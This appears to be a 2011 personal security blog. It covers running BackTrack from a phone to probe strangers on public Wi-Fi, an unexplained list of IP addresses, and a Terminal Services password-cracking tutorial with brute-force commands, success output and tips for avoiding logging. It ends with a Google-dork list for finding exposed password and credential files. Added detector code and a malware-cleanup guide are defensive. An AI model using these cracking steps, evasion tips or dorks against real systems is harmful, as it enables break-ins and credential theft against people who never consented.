2011-10-22

Backtrack 5 on iPad1

Well, not exactly, but close enough. This weekend project just got really interesting. Who would ever think an innocent Apple iPad would be "pentesting" in a Starbucks? Ok, I really didn't run the proof of concept at a Starbucks, I did it in my personal sandbox.  But in theory it can be done for "research" and for academic purposes.   This actually started with just trying to get BT5 on my phone, a rooted Android.  But after getting it to work, and running it for a few hours, I got frustrated with the small text and the difficulty of entering text and special key strokes.

So in its simplest concept: fire up the VNC server on the Android, fire up a VNC client on the iPad (tablet), and remote control the Android. So let's light this firecracker...


Hardware:
1. Android Smart Phone (rooted): tested on AT&T HTC Inspire. Android Froyo with 8GB MicroSD.
2. Apple iPad: tested with iOS5. any working iPad will do or in this case any tablet device.


Software:
1. BackTrack 5 for Android:  http://forum.xda-developers.com/showthread.php?t=1079898  - RTFM (google it if you don't know), follow instructions on how to load it on your Android.
2. Terminal Emulator for Android: this is a must to get BT5 running. It has to run rooted. A simple "SU" command on the "$" prompt will switch you to a bash "#".
3. VNC for iPad: the free VNC lite will do.  You do not need the VNC Viewer ($9.99).

Notes:
1. After you get BT5 running on Android, make sure your VNC server is running.  If you forgot to activate it during the initial startup, just type "startvnc".
2. The usual default port for VNC is "5900"; for BT5 on Android it's "5901".
3. default username and password is both "root"
4. Obviously, the iPad and the Android have to be on the same Wifi network in the same subnet.  Your "subjects" also have to be on the same Wifi network.  So, you might find yourself in a pissing contest with another pentester if you happen to run into one.
5. Caveat:  You'll have a stealth appearance; nobody would suspect that an iPad can actually pentest, especially if you keep your Android in your bag or pocket. But you'll have 2 devices on an open network! You better have a good grip on two operating systems - Android and iOS.
6. So you say, why not just use a laptop...?? True, I agree totally. But what's the fun in that.  Plus, I really like travelling light.
7. This is really a proof of concept; if you can come up with a more creative way of using your BT5 on your Android, let me know.

Happy Hunting.

2011-10-18

Friends of the Friendly Decoded

2011.10.16::H.99.2.210.47-HQ
2011.10.16::J.98.154.35.204-HQ
2011.10.13::J.166.205.139.167-HW
2011.10.15::J.71.165.187.204-50M3CRUS7
2011.10.15::J.173.51.110.6-P9CK1NGH0U53
2011.10.15::MJ.76.214.13.207-HQ
2011.10.13::MJ.75.208.211.221::166.205.33.13::166.250.63.9::166.250.32.48

2011-10-07

Terminal Service Play Ground

Tutorial: MS Terminal Server Cracking

Note:
This article is from the Ethical Hacker Network.  An excellent article was written by Chris Gates; more articles can be found under the collection of his columns.  I took the liberty of adding additional info just like I do with all my blogs.  None of my blog posts are totally done.  As I discover fixes and improvements, I will update them.

If you want to do any MS Terminal Server cracking you basically have your choice of three tools that can do it for you:
1. TSgrinder.
2. TScrack.
3. and a patched version of RDesktop. 
Video: Terminal Server / RDP Password Cracking, takes you step-by-step through the concepts, tools and usage.

Tools:
1. TSGrinder is readily available from http://www.hammerofgod.com/download.html.
2. TSCrack you’ll have to google for as it is not readily available anymore.
3. Rdesktop v1.41 can be downloaded from http://www.rdesktop.org/ and you’ll need the patch from foofus.net http://www.foofus.net/jmk/rdesktop.html.

Part 1: MS Terminal Services Overview

Hacking Exposed Windows Server 2003 gives a great overview; I won’t plagiarize it all here, so check it out for more details, and see the references section of this paper for some MS references.
Prior to Terminal Services, Windows did not provide the ability to run code remotely in the processor space of the server. Another way to put this is that there was no way to have an “interactive” session on the server. There were tools like wsremote, psexec or VNC. If an attacker got a non-administrator-level account on a remote machine they could map shares and copy files but had a difficult time running code on the server. Now, with Terminal Services, an attacker can log on as a non-privileged user and run local exploit code via the Terminal Services GUI. These attacks used to be fairly limited to local physical attacks or to users who were actually logging into your domain, but now if the server has Terminal Services (Windows 2000 Server, Windows Server 2003) or RDP (Windows XP) running, the attack vector increases.
Terminal Services listens on port 3389 by default (this can be changed by editing the registry).

If you want to change the listening port, edit this registry value:
HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp, value PortNumber (REG_DWORD), default 3389

To turn on Terminal Server/RDP from the command line, set this registry value (0 allows connections, 1 denies them):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
With this command you can enable the RDP service.

Password Cracking Basics 

There are three types of password attacks:

1. Brute Force: A cryptanalysis technique or other kind of attack method involving an exhaustive procedure that tries all possibilities, one-by-one. [1] For example, the program might follow a sequence like this:
"aaaaaaaa"
"aaaaaaab"
"aaaaaaac" ...
Until the password is found

2. Dictionary Attack: An attack that tries all of the phrases or words in a dictionary, trying to crack a password or key. A dictionary attack uses a predefined list of words compared to a brute force attack that tries all possible combinations. [2]

3. Hybrid Attack: A hybrid attack is a mixture of a brute force attack and a dictionary attack. There are many different ways a hybrid attack can be performed; in its simplest form a hybrid attack may simply add a couple of numbers to the end of each dictionary word tried. This increases the number of tested combinations without having to resort to a true brute force attack. Cracking software will often use a combination or selection of all three methods to try and guess your password. [3]

Part 1: Terminal Services Enumeration

Fire up Google,  https://encrypted.google.com - always search encrypted

Search  for “/TSWeb/default.htm”



Figure 1.1: Output of a google search for /TSWeb/default.htm

Pick a subject of your choice and fire up Nmap.
You can Nmap for port 3389.

Figure 1.2: A Nmap scan looking for port 3389 open on the Class C.

Figure 1.3: Results on the Nmap Scan looking for open port 3389.

You can use ProbeTS (http://www.hammerofgod.com/download/probets.zip):

Figure 1.4: The output of probeTS.

Terminal Services Connections

Let’s see what a regular Terminal Services connection looks like.

Figure 1.5: the Terminal Services/RDP Client on Windows 2000 Pro to a Windows 2000 Terminal Server.


Figure 1.6: Issuing a command over the Terminal Services Client.

Part 2: TSGrinder

From the TSGrinder website:
“TSGrinder is the first production Terminal Server bruteforce tool. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. Also having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts.
TSGrinder is a "dictionary" based attack tool, but it does have some interesting features like "l337" conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection.
Also, the problem you describe can be exacerbated in that administrator account can be brute-forced without creating a log entry, by attempting 5 logons and disconnecting before Windows disconnects and logs after the sixth failure.”
Let’s see TSGrinder in action. I had to use the Windows XP RDP client on Windows 2000 SP4 to get TSGrinder to work properly. I did not need the roboclient.zip that it mentions on the website.

Figure 2.1: TSGrinder being run with no arguments.


Figure 2.2: TSGrinder using a dictionary attack against the administrator account.



Figure 2.3: A failed attempt.


Figure 2.4: if TSGrinder guesses the password it will log into the terminal services and immediately disconnect.

Figure 2.5: A successful attempt with TSGrinder.

Figure 2.6: TSGrinder supports 2 threads. Here you can see two threads running the attack.

Figure 2.7: A successful attempt with TSGrinder that used 2 threads to run the attack.

Part 3: TScrack

From the TScrack documentation:
“The Windows Terminal Services facility offers graphical desktop sessions to remote clients. Terminal Services enables users to work in a windows session that exists on the server. The client functionality is basically reduced to the functionality of a terminal, all it does is display the session screen, and collect user input.
TScrack applies AI technology (Artificial Neural Networks) to scrape the screen contents of the graphical logon, in order to enable a simple dictionary based cracking algorithm to perform efficiently against the graphically presented logon dialogs and message boxes.
This is very similar to the technology used i.e. in Optical Character Recognition (OCR), Face- and Image recognition in general.
TScrack was written for two purposes:
a) To provide a tool to assess password security of MS RDP servers
b) As proof of concept code, to point out that graphical logons are by no means secure from automated cracking / password guessing tools”

Figure 3.1: TScrack being run with no arguments.

Figure 3.2: TScrack being run against a Windows Server 2003 Terminal Server

Figure 3.3: TScrack successfully cracking the password

Figure 3.4: TScrack also does multithreading cracking, use the –t option for 2 connections

Figure 3.5: TScrack with two simultaneous connections running

Figure 3.6: TScrack successfully cracking the password
TScrack was updated to v2.1 to include brute force attacks (something TSGrinder does not do).

Figure 3.7: TScrack in Brute force mode (-B option & max word length of 6)
**Note 1: I attempted to use the –N (no logging option). Windows Server 2003 still logged every failed attempt to log on (which is good).

Figure 3.8: TScrack in Brute force mode with the –N (no logging) option

Figure 3.9: Even with –N enabled Windows Server 2003 logged the attempts. I did not test every configuration on every type of OS, I just noticed it was logging the attempt and shared the info.
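As an added illustration of what the server-side logging described in Note 1 gives a defender (this is example code written for this page, not part of Chris Gates' article or of any of the tools discussed): a small Python detector that reads a simplified, constructed one-line rendering of Windows Security log events and flags a source address that racks up failed Terminal Services logons (Logon Type 10, RemoteInteractive) within a short window. The line format, account names and addresses are constructed for the example; the event IDs (529 failed / 528 and 540 successful logon on Windows 2000/2003, 4625 / 4624 on Vista and later) are the real ones, but a reader has to map their own log export onto the same fields.

```python
# Added example for this page (not from Chris Gates' article or any of the
# tools it covers): flag bursts of failed Terminal Services logons in
# Windows Security log lines, grouped by source address and account.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Event IDs: 529 = failed logon and 528/540 = successful logon on Windows
# 2000/2003; 4625 / 4624 are the equivalents on Vista and later.
# Logon Type 10 = RemoteInteractive, i.e. a Terminal Services / RDP session.
FAILED_LOGON_IDS = {529, 4625}
SUCCESS_LOGON_IDS = {528, 540, 4624}
RDP_LOGON_TYPE = 10

# One event per line, a constructed rendering for this example. A real export
# carries the same fields (time, event id, logon type, account, source address)
# spread over several lines; adapt the regex to the export you use.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) EventID=(?P<id>\d+) "
    r"LogonType=(?P<lt>\d+) User=(?P<user>\S+) Source=(?P<src>\S+)$"
)

# Constructed sample: eight failures from one address against "administrator"
# in twenty seconds, then a success; one stray failure from another address.
SAMPLE_LOG = """\
2011-10-07 22:01:03 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:04 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:05 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:06 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:07 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:20 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:21 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:22 EventID=529 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:01:40 EventID=528 LogonType=10 User=administrator Source=192.168.0.50
2011-10-07 22:03:00 EventID=529 LogonType=2 User=chris Source=-
2011-10-07 22:05:00 EventID=529 LogonType=10 User=chris Source=192.168.0.77
2011-10-07 22:09:00 EventID=528 LogonType=10 User=chris Source=192.168.0.77
"""


def parse_events(text):
    """Parse the one-line format above into a list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not logon events
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "id": int(m["id"]),
            "logon_type": int(m["lt"]),
            "user": m["user"],
            "src": m["src"],
        })
    return events


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return one alert per (source, account) that accumulates `threshold`
    failed RDP logons inside any `window`-long span, noting whether a
    successful RDP logon for the same pair followed the burst."""
    rdp = [e for e in events if e["logon_type"] == RDP_LOGON_TYPE]
    failures = defaultdict(list)
    for e in rdp:
        if e["id"] in FAILED_LOGON_IDS:
            failures[(e["src"], e["user"])].append(e["ts"])

    alerts = []
    for (src, user), times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # slide the window start forward until the span fits in `window`
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = times[end]
                success_after = any(
                    e["id"] in SUCCESS_LOGON_IDS and e["src"] == src
                    and e["user"] == user and e["ts"] >= burst_end
                    for e in rdp
                )
                alerts.append({"src": src, "user": user,
                               "failures": len(times),
                               "success_after": success_after})
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)):
        print("ALERT: %(failures)d failed RDP logons for %(user)s from %(src)s"
              " (later success: %(success_after)s)" % a)
```

The counter works per source and account across connections rather than per session, so the "five attempts then disconnect" behaviour quoted from the TSGrinder site in Part 2 still accumulates into one alert; set the threshold well below the account-lockout value so the alert fires on the Administrator account, which the quote notes cannot be locked out for local logons.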
**Note 2: I also had to drastically change the default password policy on Server 2003 to put an easy to crack password. I chose a password of “chrisg” as the password I wanted to brute force.

Figure 3.10: Here is the default password policy for Windows Server 2003

Figure 3.11: What I changed the password policy to, to allow “chrisg” as a password
**Note 3: I had to run TScrack 2.1 on a Windows 2000 machine; it wasn’t working properly on Windows XP SP2. Also, if you are getting an MSRDP.OCX error, uninstall TScrack using the “-U” option, then reinstall by issuing TScrack.exe –h.

Part 4: Rdesktop & BruteForcing RDP with Rdesktop patch

Download rdesktop version 1.41 from the website:
http://www.rdesktop.org/
http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.4.1.tar.gz?download
Download the rdp-bruteforce patch from foofus.net:
http://www.foofus.net/jmk/rdesktop.html
http://www.foofus.net/jmk/tools/rdp-brute-force-r422.diff
Paste the patch into the source directory and apply the patch
SegFault:/Users/chrisgates/Desktop root# cd rdesktop-1.4.1
SegFault:/Users/chrisgates/Desktop/rdesktop-1.4.1 root# patch -p1 -i rdp-brute-force-r422.diff
patching file orders.c
patching file orders.h
patching file rdesktop.c
patching file rdesktop.h
patching file rdp.c
patching file secure.c
patching file xkeymap.c

Compile and install rdesktop:
./configure
make
sudo make install
Start X-Windows/X-Darwin/X11 (I used X-Darwin installed using fink on Mac OS X Tiger). This shouldn’t be an issue if you are using a Linux flavor with a GUI.
Now start Rdesktop with your passlist and user or userlist:
SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ rdesktop -u administrator -p pass.txt 192.168.0.105
**you'll need to run this from X-Darwin/X-Windows/X-11, if you run it from the command line it will say something like:
ERROR: Failed to open display:
If everything is working right you'll see it opening the Rdesktop trying to log in and then exiting. Check your command line output to see if you were able to guess the password.

Figure 4.1: Running Rdesktop with no parameters gives you the help menu.

Figure 4.2: Issuing the command line parameters to start Rdesktop in *nix in XDarwin.

Figure 4.3: Rdesktop brute forcing the accounts.
The following output was against an XP Pro SP2 host. With XP if the user is currently logged in, they will be forced to log off if you connect to the machine over RDP.
SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ rdesktop -u noone -p pass.txt 192.168.0.105
Starting dictionary attack against server 192.168.0.105
-------------------------------------------------------
Retrieved connection termination packet.
Account credentials are NOT valid.
Retrieved connection termination packet.
[failure] User "noone" Password "test"
Retrieved connection termination packet.
Account credentials are NOT valid.
Retrieved connection termination packet.
---SNIP---
[failure] User "noone" Password "admin"
Retrieved connection termination packet.
Account credentials are NOT valid.
Retrieved connection termination packet.
[failure] User "noone" Password "administrator"
Valid credentials, however, another user is currently logged on.
[success] User "noone" Password "noone"
SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$


Figure 4.4: The command line output of the successful attack against XP SP2 but with the user logged in.
Let’s see Rdesktop against a Windows Server 2003.

Figure 4.5: Rdesktop against Windows Server 2003 against the “chris” account.

Figure 4.6: Rdesktop successfully cracking the password with a dictionary attack.

References

Terminal Services References:
http://www.microsoft.com/windowsserver2003/techinfo/overview/termserv.mspx
TSGrinder References:
TSGrinder: http://www.hammerofgod.com/download/tsgrinder-2.03.zip
http://www.ethicalhacker.net/www.blackhat.com/presentations/bh-asia-03/bh-asia-03-mullen.pdf
http://www.msterminalservices.org/articles/Brute-Force-Hacking-Terminal-Server-Environments.html
Hacking Exposed Windows Server 2003 CH 12.
TSCrack References:
http://web.mac.com/opticrealm/iWeb/asurobot/My%20Cyber%20Attack%20Papers/My%20Cyber%20Attack%20Papers_files/remote%20dictionary%20tscrack%20Nov_6_2005.pdf
Hacking Exposed Windows Server 2003 CH 12.
Rdesktop References:
Rdesktop: http://www.rdesktop.org/ & http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.4.1.tar.gz?download
Rdesktop patch by JMK of foofus: http://www.foofus.net/jmk/rdesktop.html & http://www.foofus.net/jmk/tools/rdp-brute-force-r422.diff

Footnotes

[1] http://www.onlinetravelsafe.com/choosing_passwords.php
[2] http://www.sans.org/resources/glossary.php
[3] http://www.onlinetravelsafe.com/choosing_passwords.php
 


Victimized by an Anti-Virus Trojan


A non-techie friend approached me with a laptop issue.  This is your typical common internet surfer problem: ”My laptop is just so slow all of a sudden, I think something is wrong with it.  I let my 5 yr old nephew play with it.”

Long story short – it was a Core i3 and processor activity was pegged at 100%, and an annoying “OpenCloud AV” was reporting it found 6 trojans on it!!  Yeah right, 6, how about 200 or more.  This OpenCloud AV is the culprit, and these are the steps I took to try and get rid of it.  Mind you, I didn’t really want to spend time doing this, so these are the most minimal steps.  Oh BTW, I didn’t see any legitimate AV running to protect the laptop.  This is probably how it got infected in the first place.

This is a Windows 7 Home Premium Toshiba Laptop.

Here’s the simple game plan:
1. Google info about the suspected culprit - In this case “OpenCloud AV” – as it turned out, it surely is an open cloud since it sends info to the internet. Free info for all!
2. Boot to Safe Mode – delete, clean up, kick, shout, do whatever you have to do to catch all the files in there.  They will be hidden or disguised as legitimate files.  Through my search I ended up on a website that offers an automatic tool to remove it! Hahaha! Nice try! I wasn’t born yesterday.  It actually also offered manual removal instructions, but warned extensively of the dangers of doing so. Here’s an excerpt.

“Please, note that manual removal of OpenCloud AV virus is a procedure with high complexity and can not always guarantee a full removal of the virus, due to the fact that some objects can stay hidden or may become reanimated automatically after incomplete removal. What’s more, lack of the required skills and even the slightest deviation from the removal guides may result in irreparable system corruption. That’s the reason it’s strongly advised automatic removal of OpenCloud AV virus, which will save your time and avoid any system corruptions and ensure the desired result.”

BTW, I checked the manual instructions against the infected laptop, none of the instructions applied to the problem.  By default, Windows will hide system files and folders from view.  You have to change your settings to show all that.  Also double check the contents of %AppData%,  %Programs% and %Temp% . Delete any unknown or junk looking files.  If you are not sure, save them somewhere else just in case you need them back. 

3. Double check your “RUN” registry entry and Startup folder – The registry is a good source to find where those hidden files are on your system drive.   If the original RUN key in the registry is clean of any Trojan-looking entries, fire up “msconfig” and look in there.  Sometimes the Trojan is smart enough to hide somewhere else.  Clean up the registry and startup last; as I mentioned above, they are a very good source of information as to where the nasty files are.
4. Install an Anti-Virus and scan - Twice! A full hard drive scan.  Let it run, even if it takes all day.  Then defrag the hard drive, delete any system dumps and delete the pagefile.
5. Windows Update and Patch -  This is very basic folks.  You change the oil and check your car every so often, right? Pilots run pre-flight checks, right? The Internet is crawling with more bad things out to get you than your highways and airways.   There should be a web surfing license just like a driver’s license and a pilot’s license.
6. Prevention   - turn on your automatic updates for both Windows and Anti-Virus.
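To make step 3 concrete, here is an added example (mine, not from the original post) that parses the text `reg query` prints for the Run keys and flags entries that launch from AppData, Temp or ProgramData paths, or that have random-looking executable names. The registry dump below is constructed for the example; the "OpenCloud AV", "kdq7xw" and "Updater" entries are invented to resemble the rogue AV described above. On the real machine, run `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and the HKLM equivalent and feed that output in instead.

```python
# Added example (mine, not from the original post): parse `reg query` output
# for the Run keys and flag autorun entries that look like the rogue AV above.
import re

# Locations from which legitimate startup programs rarely run, but where a
# dropper that landed in the user profile or Temp typically lives.
SUSPICIOUS_DIRS = ("\\appdata\\", "\\temp\\", "\\tmp\\", "\\local settings\\",
                   "\\programdata\\", "%appdata%", "%temp%")

# Constructed sample in the layout `reg query <key>` prints; the OpenCloud AV,
# kdq7xw and Updater entries are invented to resemble the infection described.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneNote    REG_SZ    "C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE" /tsr
    OpenCloud AV    REG_SZ    C:\Users\nephew\AppData\Roaming\OpenCloud AV\opencloudav.exe
    kdq7xw    REG_SZ    C:\Users\nephew\AppData\Local\Temp\kdq7xw.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SynTPEnh    REG_SZ    %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
    Updater    REG_SZ    rundll32.exe C:\ProgramData\svc\svc.dll,Start
"""

# Value lines are indented; name, type and data are separated by runs of
# whitespace (a value name may itself contain a single space).
VALUE_RE = re.compile(r"^\s{2,}(?P<name>.+?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")


def parse_run_keys(text):
    """Return [{'key', 'name', 'type', 'data'}] for every value under each key."""
    entries, key = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            key = line.strip()  # an unindented line is the key path
            continue
        m = VALUE_RE.match(line)
        if m and key:
            entries.append({"key": key, "name": m["name"],
                            "type": m["type"], "data": m["data"]})
    return entries


def executable_path(data):
    """Pull the program (or, for rundll32, the DLL) path out of a Run value."""
    d = data.strip()
    if d.startswith('"'):
        return d[1:d.find('"', 1)]
    tokens = d.split()
    if not tokens:
        return ""
    if tokens[0].lower().endswith("rundll32.exe") and len(tokens) > 1:
        return tokens[1].split(",")[0]
    return tokens[0]


def looks_random(stem):
    """Crude check: 5+ characters mixing letters and digits, e.g. 'kdq7xw'."""
    return (len(stem) >= 5 and any(c.isdigit() for c in stem)
            and any(c.isalpha() for c in stem))


def audit_run_entries(entries):
    """Return findings for entries launching from suspicious directories or
    with random-looking executable names; clean entries are not reported."""
    findings = []
    for e in entries:
        path = executable_path(e["data"])
        low = path.lower()
        reasons = []
        if any(d in low for d in SUSPICIOUS_DIRS):
            reasons.append("launches from a profile, Temp or ProgramData directory")
        stem = low.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
        if looks_random(stem):
            reasons.append("random-looking executable name")
        if reasons:
            findings.append({"key": e["key"], "name": e["name"],
                             "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_entries(parse_run_keys(SAMPLE_REG_QUERY)):
        print("%s\\%s -> %s: %s" % (f["key"], f["name"], f["path"],
                                     "; ".join(f["reasons"])))
```

The same parser works on the RunOnce keys and on the per-user Run key of every profile on the machine; the Startup folder and the msconfig list the post mentions are separate checks, since those entries never appear in `reg query` output.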

I have a laptop I use on the Internet with absolutely no malware protection.  I just keep it fully updated, avoid going anywhere I did not personally solicit, and use a web browser with appropriate add-ons to prevent code running without me knowing about it.  I have not been infected.  The point is, with anything that you decide to do, acquire enough information before doing it.   You don’t have to be an expert race car driver to drive a car, but you need just enough skill to keep yourself and others safe.

Additional notes: 
It is possible that Windows 7's Licensing Store may be corrupt or unreadable.  If it is, you might get a "This copy of Windows is not genuine" message above your system tray, even if you know you have a legit copy.  You will need your Activation Key for the steps below.  It is usually located on the green Microsoft license sticker found on workstations or at the bottom of a laptop.  Try the steps below to recreate the Store.

1) Open an Internet Browser
2) Type: %windir%\system32 into the browser address bar.
3) Find the file CMD.exe
4) Right-Click on CMD.exe and select 'Run as Administrator'
5) Type: net stop sppsvc   (It may ask you if you are sure, select yes)
Note: the Software Protection service may not be running, this is ok.
6) Type: cd %windir%\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform
7) Type: rename tokens.dat tokens.bar
8) Type: cd %windir%\system32
9) Type: net start sppsvc
10) Type: slui.exe
11) After a couple of seconds the Windows Activation dialog will appear. You may be asked to re-activate and/or re-enter your product key, or Activation may occur automatically.


If you have a product key, then you can reactivate Windows 7.
1. Click the Start button
2. Type: slui.exe 3 and hit the Enter key
3. Type in the Product key from the sticker on your computer
4. Click the Next button.
5. You will be asked if you want to Activate, click OK

You can also activate by phone  by following these steps.
1. Click the Start button
2. Type: slui.exe 4 and hit the Enter key
3. Select your location in the drop down menu and click the Next button
4. The next screen provides the number to call to Activate by Phone
How to contact a Microsoft Product Activation Center:
http://support.microsoft.com/default.aspx/kb/950929/en=us

2011-10-06

Goodly-Googly! Let's search like pros!

Google advanced search operators, operator combinations, and related uses:
  • link:URL = lists other pages that link to the URL.
  • related:URL = lists other pages that are related to the URL.
  • site:domain.com “search term” = restricts search results to the given domain.
  • allinurl:WORDS = shows only pages with all search terms in the url.
  • inurl:WORD = like allinurl: but filters the URL based on the first term only.
  • allintitle:WORD = shows only results with terms in title.
  • intitle:WORD = similar to allintitle, but only for the next word.
  • cache:URL = will show the Google cached version of the URL.
  • info:URL = will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
  • filetype:SOMEFILETYPE = will restrict searches to that filetype
  • -filetype:SOMEFILETYPE = will remove that file type from the search.
  • site:www.somesite.net “+www.somesite.net” = shows you how many pages of your site are indexed by google
  • allintext: = searches only within text of pages, but not in the links or page title
  • allinlinks: = searches only within links, not text or title
  • WordA OR WordB = search for either the word A or B
  • “Word” OR “Phrase” = search exact word or phrase
  • WordA -WordB = find word A but filter results that include word B
  • WordA +WordB = results must contain both Word A and Word B
  • ~WORD = looks up the word and its synonyms
  • ~WORD -WORD = looks up only the synonyms to the word
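Added example (not from the original post): a small Python parser for the operator syntax listed above, plus a helper that reads a handful of the queries from the "Old school Google Hacks list" further down the page and collects the file extensions and URL fragments they target, which is a quick way to build a self-audit list for one's own web root. The grammar handled here is my approximation of Google's (quoted phrases, operator:value, parenthesised alternatives, the - + ~ prefixes, OR and |); the DORKS list is copied from the page, and nothing here contacts Google.

```python
# Added example (not from the original post): a parser for Google's operator
# syntax and a helper that turns dork queries into a self-audit list.
import re

# One token per match: optional prefix, optional operator, then a quoted
# phrase, a parenthesised group, or a bare word.
TOKEN_RE = re.compile(r"""
    (?P<prefix>[-+~])?              # - exclude, + require, ~ synonyms
    (?:(?P<op>[a-z]+):)?            # operator name such as site, inurl, filetype
    (?:
        "(?P<quoted>[^"]*)"         # quoted phrase
      | \((?P<group>[^)]*)\)        # parenthesised alternatives: (a | b)
      | (?P<bare>[^\s"()]+)         # bare word
    )
""", re.VERBOSE)

FILE_OPERATORS = {"filetype", "ext"}
PATH_OPERATORS = {"inurl", "allinurl"}

# A handful of queries copied from the dork list on this page.
DORKS = [
    '"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)',
    'filetype:ini ws_ftp pwd',
    'filetype:bak inurl:"htaccess|passwd|shadow|htusers"',
    'intitle:"index of" intext:connect.inc',
    'inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample',
    'filetype:sql "insert into" (pass|passwd|password)',
    'ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn',
    'intitle:"Remote Desktop Web Connection" inurl:tsweb',
]


def parse_query(query):
    """Turn a query string into a list of terms:
    {'op': operator or None ('OR' for a bare OR / |), 'value': raw text,
     'prefix': '-', '+', '~' or None, 'alternatives': value split on '|'}."""
    terms = []
    for m in TOKEN_RE.finditer(query):
        if (m["bare"] is not None and m["op"] is None and m["prefix"] is None
                and m["bare"] in ("OR", "|")):
            terms.append({"op": "OR", "value": None, "prefix": None,
                          "alternatives": []})
            continue
        value = next(v for v in (m["quoted"], m["group"], m["bare"]) if v is not None)
        alternatives = [a.strip() for a in value.split("|") if a.strip()]
        terms.append({"op": m["op"], "value": value, "prefix": m["prefix"],
                      "alternatives": alternatives})
    return terms


def sensitive_patterns(dorks):
    """Collect the extensions (filetype:/ext:) and URL fragments (inurl:/
    allinurl:) a list of dorks looks for; excluded (-) terms are skipped
    because they narrow the search rather than describe the target."""
    exts, paths = set(), set()
    for q in dorks:
        for t in parse_query(q):
            if t["prefix"] == "-" or t["op"] == "OR":
                continue
            if t["op"] in FILE_OPERATORS:
                exts.update(a.lower() for a in t["alternatives"])
            elif t["op"] in PATH_OPERATORS:
                paths.update(a.lower() for a in t["alternatives"])
    return sorted(exts), sorted(paths)


if __name__ == "__main__":
    exts, paths = sensitive_patterns(DORKS)
    print("extensions to look for under the web root:", ", ".join(exts))
    print("names / path fragments to look for:", ", ".join(paths))
```

Pointing the second half at the full list (rather than the eight queries embedded here) gives the complete set of extensions and names to grep for in a site's document root and directory listings; anything that matches is worth removing or putting behind authentication before a crawler finds it.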

2011-10-03

Old school Google Hacks list

Code:

"admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
"Duclassified" -site:duware.com "DUware All Rights reserved"
"duclassmate" -site:duware.com
"Dudirectory" -site:duware.com
"dudownload" -site:duware.com
"Elite Forum Version *.*"
"Link Department"
"sets mode: +k"
"your password is" filetype:log
"DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
